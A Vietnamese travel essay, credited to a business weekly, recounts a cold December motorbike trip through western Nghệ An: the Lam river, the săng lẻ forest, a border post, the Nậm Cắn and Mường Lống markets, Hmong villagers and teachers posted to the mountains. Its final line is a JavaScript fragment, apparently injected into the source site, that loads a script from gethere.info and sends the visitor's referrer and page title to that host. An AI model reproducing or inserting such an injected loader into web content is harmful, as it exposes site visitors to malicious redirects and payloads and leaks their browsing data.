Nhận được lời mời của người bạn làm kiểm lâm ở khu vực phía tây Nghệ An, chúng tôi mua vé ôtô đêm đi Con Cuông vào một ngày cuối tháng 12 rét mướt. Theo lời bạn kể thì nơi này rất lý tưởng cho những ai yêu núi rừng và thích khám phá: rừng quốc gia Pù Mát rộng lớn phong phú, con đường mòn chạy dọc chân dãy Trường Sơn đầy nắng và gió đẹp mê mải… Đến bến xe Con Cuông lúc 4 giờ sáng, ai nấy tưởng nhiệt độ sắp chạm mốc 0 độ C đến nơi. Cũng may là trời ấm lên một chút lúc hửng sáng nên cả nhóm có thể bắt đầu chuyến đi khá thuận lợi.
Xuất phát từ Con Cuông, chúng tôi chạy xe máy dọc sông Lam, ngược dòng về phía biên giới Việt Lào. Trời càng sáng rõ, tôi càng ngỡ ngàng trước cảnh non xanh nước biếc. Núi xanh, dòng sông Lam cũng xanh ngắt và trong trẻo. Cái lạnh tê tái của vùng núi xứ Nghệ và cảm giác đằng sau tay lái càng làm mọi người phấn khích. Cả nhóm ăn sáng bằng đặc sản bánh mướt. Bánh mướt cũng gần giống bánh cuốn, sau khi tráng xong bánh được cuộn tròn lại, thêm ít hành phi, ăn kèm chả giò và nước chấm. Trời lạnh đến mức đĩa bánh mới mang ra còn nghi ngút khói mấy phút sau đã nguội.
Càng đi nhà cửa càng heo hút, người dân bản địa thậm chí còn tròn mắt nhìn khi nghe thấy chúng tôi nói giọng Bắc bộ. Ngay cả khi đến thị trấn Hòa Bình, chúng tôi cũng không thấy cửa hàng tạp hóa nào lớn, chỉ có các cửa hàng nhỏ bán các loại bánh kẹo địa phương, những loại bánh mà lâu lắm rồi tôi không nhìn thấy ở miền xuôi. Một trong những bức ảnh Tây Nghệ An mà chúng tôi ấn tượng nhất trước đây là bức ảnh chụp khu rừng săng lẻ bừng lên trong nắng. Tiếc thay lần này cả nhóm đến rừng săng lẻ lúc không có nắng nên cả khu rừng ẩn trong màu trắng của sương mù. Hơi thất vọng một chút, nhưng bù lại mọi người vẫn có những khoảnh khắc tuyệt vời hơn rất nhiều so với mong đợi.
Qua rừng săng lẻ một chút là vùng toàn người dân tộc thiểu số. Chúng tôi dừng tại cửa hàng tạp hóa nhỏ của một phụ nữ người Mông mua ít bánh kẹo để chia cho trẻ con dọc đường. Hỏi chuyện mới biết chủ quán này 20 tuổi, lấy chồng năm 15 tuổi, giờ đã là mẹ của hai đứa con! Các em bé chăn trâu mà chúng tôi tặng kẹo rất hồn hậu. Sau khi nhìn khách lạ một cách tò mò, các em rụt rè nhận kẹo và cười bẽn lẽn khi chụp ảnh.
Đến đây rồi, vào đồn biên phòng Mường Típ ở dưới chân núi Phu Vai Ta Leng (đỉnh núi này cao 2.714m, cao nhất Trường Sơn Bắc) để xin giấy phép vào khu vực biên giới, các anh bộ đội vẫn hỏi đi hỏi lại câu: “Các em đi đâu? Ủa đi chơi mà sao xuống tận vùng heo hút này làm gì vậy?”. Câu trả lời của tôi đây:
Đi để biết cảm giác chạy ngược dòng sông Lam, dọc biên giới Việt Lào, dọc Tây Trường Sơn đầy nắng và gió, cỏ cây nhuốm màu vàng ruộm sau một mùa gió Lào gay gắt.
Chạy dọc dòng Nậm Nơm – một nhánh của sông Lam nước xanh ngắt và trong trẻo, thỉnh thoảng chúng tôi bắt gặp người dân thong thả trên một chiếc bè xuôi dòng về phía đông. Cả nhóm dừng chân ở vệ cỏ ven đường, ngồi ngắm dòng sông lững lờ chầm chậm trôi, và mặt trời dần dần khuất sau dãy Tây Trường Sơn mờ mờảo ảo. Ánh hoàng hôn tắt dần, màn đêm buông xuống cùng với mức giảm nhiệt độ đến chóng mặt. Mặc dù tôi đã quá quen với mùa đông rét mướt với những đợt gió mùa đông bắc lạnh buốt tràn về, nhưng thực sự thì cái lạnh ở vùng biên giới Việt Lào này vượt xa những gì tôi đã trải qua ở miền Bắc.
Sáng hôm sau chúng tôi lên cửa khẩu Nậm Cắn rồi lên Mường Lống – nơi được mệnh danh là Sa Pa của Nghệ An. Sương mù dày đặc, ai cũng run cầm cập trong cái giá buốt 3 độ C của miền núi cao. Mọi thứ xung quanh đều trắng xóa, người đi bộ cách mình 3 mét thôi cũng chẳng thấy rõ. Ở Mường Lống có nhà của thầy giáo Lâm là nơi mọi người hay đến gửi xe, mua đồ ăn và sưởi ấm. Đợt chúng tôi đi cũng đúng là dịp chợ phiên ở cửa khẩu Nậm Cắn và Mường Lống, nhưng thời tiết khắc nghiệt và sương mù làm phiên chợ ít nhộn nhịp hơn chúng tôi mong đợi. Những phiên chợ như thế này là dịp các thầy cô giáo của các trường miền núi gặp gỡ giao lưu, mỗi người một quê quán, hoàn cảnh khác nhau, người từ Thanh Hóa, người ở Đô Lương, người ở Con Cuông cùng về đây dạy học và lập gia đình.
Chén rượu gạo ấm nóng bên câu chuyện của các thầy cô khiến chúng tôi hiểu hơn về tâm sự của những người giáo viên xa quê, cùng nhau đi qua những mùa gió Lào khắc nghiệt và mùa đông lạnh lẽo của vùng biên giới xa xôi này.
Theo doanhnhansaigoncuoituan.com.vn
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;